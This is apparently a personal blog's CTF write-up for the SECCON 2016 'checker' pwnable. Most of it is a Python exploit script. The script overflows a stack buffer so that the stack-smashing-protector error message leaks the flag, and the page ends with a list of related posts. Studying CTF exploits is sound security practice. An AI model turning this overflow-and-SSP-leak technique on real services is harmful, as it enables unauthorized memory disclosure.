Category : Pwnables
checkerSummary : memory leak with SSP protection
Exploit
|
#!/usr/bin/python from socket import * from struct import pack, unpack import time def rc(s, ch): res = '' while ch not in res: res += s.recv(1) return res p = lambda x : pack("<L", x) up = lambda x : unpack("<L", x)[0] HOST = 'checker.pwn.seccon.jp' PORT = 14726 target = "a"*0x178+"\xc0\x10\x60\x00\x00\x00\x00\x00" s = socket(AF_INET, SOCK_STREAM) s.connect((HOST, PORT)) rc(s, 'NAME : ') s.send('pwn3r\n') rc(s, '>> ') s.send('a'*(len(target) - 1)+'\n') rc(s, '>> ') s.send('a'*(len(target) - 2)+'\n') rc(s, '>> ') s.send('a'*(len(target) - 3)+'\n') rc(s, '>> ') s.send('a'*(len(target) - 4)+'\n') rc(s, '>> ') s.send(target[:0x178+3]+'\n') rc(s, '>> ') s.send('yes'+'\n') rc(s, 'FLAG : ') s.send('gogo\n') time.sleep(1) print s.recv(1024) s.close() """ pwn3r$ python check_exploit.py You are a liar... *** stack smashing detected ***: SECCON{y0u_c4n'7_g37_4_5h3ll,H4h4h4} terminated
""" |
'CTF > 2016' 카테고리의 다른 글
| 33C3 CTF - grunt (0) | 2018.12.14 |
|---|---|
| 33C3 CTF - tea (0) | 2018.12.14 |
| 33C3 CTF - rec (0) | 2018.12.14 |
| 33C3 CTF - babyfengshui (0) | 2018.12.14 |
| SECCON CTF QUAL 2016 - jmper (1) | 2017.01.02 |